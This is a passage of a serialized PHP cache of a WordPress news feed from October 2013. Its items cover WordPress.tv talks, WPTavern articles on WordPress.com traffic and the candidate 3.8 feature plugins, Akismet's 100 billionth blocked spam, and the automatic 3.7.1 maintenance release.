Care?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24427\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"http://wordpress.tv/2013/10/30/todd-oneill-whats-content-strategy-and-why-should-i-care/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:702:\"<div id=\"v-txJwUhUj-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24427/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24427/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24427&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/30/todd-oneill-whats-content-strategy-and-why-should-i-care/\"><img alt=\"Todd O&#8217;Neill: What’s Content Strategy and Why Should I Care?\" src=\"http://videos.videopress.com/txJwUhUj/video-e5bb917263_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 19:25:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WPTavern: Huge Collection Of WordPress Site Logos\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10740\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://feedproxy.google.com/~r/WordpressTavern/~3/eplmPDEcBQc/huge-collection-of-wordpress-site-logos\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:948:\"<p>WPTavern was founded in 2008 and since that time, we&#8217;ve published close to 1,500 articles discussing all things WordPress. I&#8217;ve made it a habit to use the logo of any site I link to, as the first image presented in the article. After five years, the WPTavern media library is filled with WordPress centric images captured mostly with SnagIt, my favorite screen capturing software. I thought it would be fun if I put together a gallery showing all of the WordPress logo images housed within the Tavern media library.<span id=\"more-10740\"></span></p>\n<p>There are around 265 images in this slide show. The images are arranged newest to oldest. As you browse through them, you&#8217;re going back in time. </p>\n<a href=\"http://www.wptavern.com/huge-collection-of-wordpress-site-logos#gallery-10740-1-slideshow\">Click to view slideshow.</a>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/eplmPDEcBQc\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 19:20:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WPTavern: The Darkside Of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10730\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://feedproxy.google.com/~r/WordpressTavern/~3/x-7qxTGpS4g/the-darkside-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:799:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/wpliftlogo.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/wpliftlogo.jpg?resize=131%2C58\" alt=\"WPLift.com Logo\" class=\"alignright size-full wp-image-10731\" /></a>WPLift.com has published a cool post that looks into the <a href=\"http://wplift.com/wordpress-dark-economy\" title=\"http://wplift.com/wordpress-dark-economy\">dark economy</a> surrounding WordPress. That is, those who use WordPress in nefarious ways for profit. Examples include spammers, those who buy automated blog comments, hackers, and the unethical practice of reselling GPL products using trademarks and branding.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/x-7qxTGpS4g\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 18:42:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: Support is Sexy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=43148\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2013/10/support-is-sexy/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:204:\"<p>Alx Block writes about <a href=\"http://alxblock.com/2013/10/support-sexy/\" title=\"Support is Sexy\">his evolving understanding of the role of support, and the &#8220;support&#8221; label itself</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 18:34:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WordPress.com Moves Up to #7 Ranked Website for US Traffic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10706\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"http://feedproxy.google.com/~r/WordpressTavern/~3/niOVq3HDB1c/wordpress-com-moves-up-to-7-ranked-website-for-us-traffic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2568:\"<p>WordPress.com is passing milestones left and right. The site is now the <a href=\"https://www.quantcast.com/top-sites\" target=\"_blank\">7th most trafficked website in the United States</a>. This comes a month after WordPress.com <a href=\"http://www.wptavern.com/wordpress-com-is-ranked-8-for-internet-traffic-in-the-us\" target=\"_blank\">slid into the #8 spot</a>, passing Yahoo, Microsoft, Yelp, Pinterest, and Tumblr for a place in the top 10. </p>\n<p><div id=\"attachment_10714\" class=\"wp-caption aligncenter\"><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/7.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/7.jpg?resize=486%2C362\" alt=\"Stats courtesy of Quantcast\" class=\"size-full wp-image-10714\" /></a><p class=\"wp-caption-text\">Stats courtesy of <a href=\"https://www.quantcast.com/top-sites\">Quantcast</a></p></div><span id=\"more-10706\"></span></p>\n<p>Traffic to WordPress.com is on a steady upwards climb and only stands to increase with the new tools aimed at helping users to expand their audience. Today the site <a href=\"http://en.blog.wordpress.com/2013/10/30/embed-follow-button/\" target=\"_blank\">announced</a> an embeddable version of the Follow Button, which allows users to follow each other and stay connected.  These buttons can be placed on any website and will further extend the reach of WordPress.com blogs across the web. The folks at <a href=\"http://about.me/\" target=\"_blank\">about.me</a> have opted to automatically integrate the embeddable Follow Buttons with user profiles.</p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/follow-en-blog1.png\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/follow-en-blog1.png?resize=305%2C38\" alt=\"follow-en-blog1\" class=\"aligncenter size-full wp-image-10716\" /></a></p>\n<p><a href=\"http://en.blog.wordpress.com/2013/08/13/introducing-wordpress-com-connect/\" target=\"_blank\">WordPress.com Connect</a> launched earlier this year, providing a new way for users to authenticate on websites using their WordPress identity. Features like these are beginning to streamline life in the WordPress ecosystem. It&#8217;s now much easier for users to keep their blogs at the center of their online presence and integrate them with an increasing number of social networks and services. WordPress.com&#8217;s growing traffic is proof that blogging is not dead, not in the slightest.  </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/niOVq3HDB1c\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 17:31:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: WordPress 3.8 Development Heats Up With Discussion of New Core Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10686\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:133:\"http://feedproxy.google.com/~r/WordpressTavern/~3/nLQWAfaJLOs/wordpress-3-8-development-heats-up-with-discussion-of-new-core-features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6916:\"<p>WordPress versions 3.7 and 3.8 have been under simultaneous development. This is the first time the project has undergone a tandem release cycle and the results so far have been very positive. The project&#8217;s momentum is at an all time high with a successful 3.7 release and some exciting core updates right around the corner in 3.8. </p>\n<p>Matt Mullenweg is leading the 3.8 development cycle, which is now at the stage where core plugins will be selected for inclusion in the core. Last week Sam Sidler <a href=\"http://make.wordpress.org/core/2013/10/22/preparing-your-feature-for-the-3-8-merge/\" target=\"_blank\">called</a> for developers to begin preparing their features for the 3.8 merge. </p>\n<p>The new &#8220;<a href=\"http://make.wordpress.org/core/features-as-plugins/\" target=\"_blank\">features as plugins</a>&#8221; approach to WordPress core development has enabled teams to work quickly on their features and get valuable feedback from the community. </p>\n<h3>Plugins Presenting for Consideration: DASH, MP6, Omnisearch and THX38</h3>\n<p>There are currently four plugins in the feedback stage, where they will be evaluated based on the following questions:<br />\n<span id=\"more-10686\"></span></p>\n<ul>\n<li>Does the feature belong in core?</li>\n<li>Is the feature ready for core?</li>\n<li>Should the feature be in this release?</li>\n</ul>\n<p>Project team leaders with features ready for 3.8 have presented their plugins on the <a href=\"http://make.wordpress.org/core/\" target=\"_blank\">core make.wordpress.org blog</a>. Each has provided a written overview of the problem that their plugin solves.</p>\n<p>Here&#8217;s a quick look at the four plugins that are being considered as new features for WordPress 3.8:</p>\n<h2>DASH &#8211; Dashboard</h2>\n<div id=\"attachment_10691\" class=\"wp-caption aligncenter\"><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/dash-new.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/dash-new.jpg?resize=560%2C420\" alt=\"New Dashboard for WordPress\" class=\"size-full wp-image-10691\" /></a><p class=\"wp-caption-text\">New Dashboard for WordPress</p></div>\n<p>The DASH project aims to improve the WordPress dashboard by reorganizing it to prioritize the sections that people actually use. This plugin adds a responsive design and merges the sections for recent comments and recently scheduled/published posts into a new activity widget that will lay the foundation for an activity stream that developers can hook into.</p>\n<p>For a closer look at the DASH project, check out our <a href=\"http://www.wptavern.com/coming-soon-a-redesigned-wordpress-admin-screen-planned-for-3-8\" target=\"_blank\">interview with designer Joen Asmussen</a>. Read the <a href=\"http://make.wordpress.org/core/2013/10/23/dash-3-8-proposal/\" target=\"_blank\">DASH project proposal</a> and contribute to the discussion.</p>\n<h2>MP6</h2>\n<div id=\"attachment_10695\" class=\"wp-caption aligncenter\"><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/mp6.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/mp6.jpg?resize=560%2C316\" alt=\"MP6 WordPress Admin Plugin\" class=\"size-full wp-image-10695\" /></a><p class=\"wp-caption-text\">MP6 WordPress Admin Plugin</p></div>\n<p>The MP6 project aims to modernize the WordPress dashboard. Many WordPress users have already added this plugin because they couldn&#8217;t wait to have their sites using this admin design. MP6 vastly improves the contrast and readability of the WordPress admin. It uses the Open Sans font, incorporates more whitespace and cleaner styles. MP6 also includes a <a href=\"http://www.wptavern.com/coming-soon-a-redesigned-wordpress-admin-screen-planned-for-3-8\" target=\"_blank\">new widgets page design</a>.</p>\n<p>Check out the <a href=\"http://make.wordpress.org/core/2013/10/23/mp6-3-8-proposal/\" title=\"MP6 project proposal\" target=\"_blank\">MP6 project proposal</a> and leave any feedback from your experience with the plugin.</p>\n<h2>Omnisearch &#8211; Global Admin Search</h2>\n<div id=\"attachment_10696\" class=\"wp-caption aligncenter\"><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/omnisearch.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/omnisearch.jpg?resize=560%2C342\" alt=\"Omnisearch Plugin\" class=\"size-full wp-image-10696\" /></a><p class=\"wp-caption-text\">Omnisearch Plugin</p></div>\n<p>The Omnisearch plugin provides a global admin search. It provides three new ways to search everything in the admin: a dashboard widget, a new admin search page and a search box on the adminbar. Searching data within the dashboard requires you to navigate to the correct screen for the data that you&#8217;re looking for. But what if you&#8217;re not sure whether you should be searching posts or comments? Omnisearch solves this problem by letting you search everything.</p>\n<p>If you want to chime in on this project&#8217;s name or how it&#8217;s implemented, feel free to leave feedback on the <a href=\"http://make.wordpress.org/core/2013/10/23/omnisearch-global-admin-search-final-pitch/\" target=\"_blank\">Omnisearch plugin proposal</a>.</p>\n<h2>THX38 &#8211; Theme Experience</h2>\n<div id=\"attachment_10693\" class=\"wp-caption aligncenter\"><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/theme-experience.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/theme-experience.jpg?resize=560%2C320\" alt=\"Improved Theme Experience\" class=\"size-full wp-image-10693\" /></a><p class=\"wp-caption-text\">Improved Theme Experience</p></div>\n<p>The THX38 project aims to improve the user&#8217;s experience when viewing themes on the themes.php screen. This plugin streamlines the presentation of themes and moves the description to a details overlay. THX38 speeds up the performance of theme browsing and search. It also adds a fully responsive design for a better experience on mobile devices. One of the most visible improvements includes support for multiple screenshots per theme and a bigger display.</p>\n<p>View more screenshots and details on the <a href=\"http://make.wordpress.org/core/2013/10/23/thx-presentation/\" target=\"_blank\">THX38 project proposal</a>.</p>\n<p>Matt Mullenweg, as the 3.8 release lead, will decide which features make it into the release, but community feedback on the make.wordpress.org blogs is strongly encouraged. Just remember that even if a feature doesn&#8217;t make the cut for WordPress 3.8, that doesn&#8217;t mean it won&#8217;t ever be included. Some features may need a little more time to be polished. We&#8217;ll be following the discussions surrounding these plugins and will let you know which are selected for inclusion in the upcoming 3.8 release.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/nLQWAfaJLOs\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 12:03:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WordPress.tv: Kelly Henderson: Creating And Managing Content On Your WordPress Site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24475\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wordpress.tv/2013/10/30/kelly-henderson-creating-and-managing-content-on-your-wordpress-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:721:\"<div id=\"v-4AwFQoVv-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24475/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24475/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24475&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/30/kelly-henderson-creating-and-managing-content-on-your-wordpress-site/\"><img alt=\"Kelly Henderson: Creating And Managing Content On Your WordPress Site\" src=\"http://videos.videopress.com/4AwFQoVv/video-fdfdb263be_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Oct 2013 09:50:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: Akismet 100B\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=43151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"http://ma.tt/2013/10/akismet-100b/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"<p>Today <a href=\"http://akismet.com/\">Akismet</a> blocked its 100 billionth spam. 100,000,000,000. Billion with a B. We had to tweak the counter on the homepage to handle more numbers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 22:22:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WPTavern: WordPress 3.7.1: A Historical Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10664\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://feedproxy.google.com/~r/WordpressTavern/~3/Mr-_9NV-UoE/wordpress-3-7-1-a-historical-maintenance-release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2680:\"<p><div id=\"attachment_10668\" class=\"wp-caption alignright\"><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/zeroclicks.png\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/zeroclicks.png?resize=266%2C300\" alt=\"Zero Clicks Given tshirt - courtesy of @dimensionmedia\" class=\"size-medium wp-image-10668\" /></a><p class=\"wp-caption-text\"><a href=\"https://twitter.com/dimensionmedia/status/395300465555943424/photo/1\" target=\"_blank\">&#8220;Zero Clicks Given&#8221; tshirt</a> &#8211; courtesy of <a href=\"https://twitter.com/dimensionmedia\" target=\"_blank\">@dimensionmedia</a></p></div>Most WordPress maintenance releases are nothing to write home about, but <a href=\"http://codex.wordpress.org/Version_3.7.1\" target=\"_blank\">WordPress 3.7.1</a> is one for the history books. This is the first maintenance release where users don&#8217;t have to lift a finger to get their sites upgraded. </p>\n<p>Sites already running WordPress 3.7 will soon be automatically upgraded to the latest and greatest. </p>\n<p>The release haiku, created by <a href=\"https://twitter.com/markjaquith\" 